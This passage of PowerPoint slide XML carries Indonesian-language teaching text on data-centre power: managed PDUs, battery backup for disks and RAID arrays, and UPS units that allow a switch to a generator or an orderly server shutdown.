              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terputus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (UPS). PDU </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terkelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendukung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemantauan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melaporkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan status, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyalakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mematikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>soket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyalakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>soket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>urutan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Cadangan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Baterai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> dan Catu Daya Tak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Terputus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> (UPS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Jika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kehilangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipertahankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>selama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> jam (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tergantung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cadangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baterai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Cadangan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baterai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komponen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> drive disk dan array RAID. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Baterai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melindungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baca</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tulis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang di-cache pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kehilangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>catu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terputus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (UPS) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sementara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>listrik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mati</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> total. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berkisar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>model </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> desktop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berjam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>-jam </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Dalam </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bentuknya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang paling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sederhana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, UPS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terdiri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> bank </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baterai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sirkuit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengisian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditambah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> inverter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghasilkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tegangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> AC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tegangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> DC yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipasok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baterai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>UPS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cukup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peralihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alternatif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> generator </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siaga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Jika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sekunder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, UPS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> administrator </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setidaknya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mematikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>benar-pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyimpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> file, dan OS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyelesaikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rutinitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pematian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tepat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
